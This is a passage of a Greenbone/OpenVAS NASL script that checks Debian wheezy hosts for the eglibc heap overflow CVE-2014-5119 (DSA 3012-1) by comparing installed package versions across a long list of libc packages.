1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"eglibc on Debian Linux\";\ntag_solution = \"For the stable distribution (wheezy), this problem has been fixed in\nversion 2.13-38+deb7u4.\n\nWe recommend that you upgrade your eglibc packages.\";\ntag_summary = \"Tavis Ormandy discovered a heap-based buffer overflow in the\ntransliteration module loading code in eglibc, Debian's version of the\nGNU C Library. As a result, an attacker who can supply a crafted\ndestination character set argument to iconv-related character\nconversation functions could achieve arbitrary code execution.\n\nThis update removes support of loadable gconv transliteration modules.\nBesides the security vulnerability, the module loading code had\nfunctionality defects which prevented it from working for the intended\npurpose.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(703012);\n script_version(\"$Revision: 6769 $\");\n script_cve_id(\"CVE-2014-5119\");\n script_name(\"Debian Security Advisory DSA 3012-1 (eglibc - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-20 11:56:33 +0200 (Thu, 20 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-08-27 00:00:00 +0200 (Wed, 27 Aug 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3012.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u4\", 